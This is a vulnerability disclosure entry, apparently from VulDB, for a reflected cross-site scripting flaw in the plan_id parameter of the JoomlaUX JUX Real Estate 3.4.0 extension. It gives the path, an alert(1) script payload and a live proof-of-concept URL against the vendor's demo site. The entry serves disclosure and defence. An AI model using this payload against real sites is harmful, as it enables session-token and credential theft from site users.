| タイトル | JoomlaUX JoomlaUX JUX Real Estate 3.4.0 Cross Site Scripting |
|---|
| 説明 | # Exploit Title: JUX Real Estate 3.4.0 - RXSS
# Exploit Author: Emano888
# Date: 10/03/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Impact: Manipulate the content of the site
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path:
/extensions/realestate/index.php/agents/agent-register/addagent
https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
GET parameter 'plan_id' is vulnerable to XSS
https://[hostname]/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
Payload: "><sCrIpT>alert(1)</sCrIpT>
Live POC:
https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| ソース | ⚠️ https://demo.joomlaux.com/extensions/realestate/index.php/agents/agent-register/addagent?plan_id=%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| ユーザー | Anonymous User |
|---|
| 送信 | 2025年03月10日 21:44 (1 年 ago) |
|---|
| モデレーション | 2025年03月24日 12:36 (14 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 300734 [JoomlaUX JUX Real Estate 3.4.0 addagent plan_id クロスサイトスクリプティング] |
|---|
| ポイント | 20 |
|---|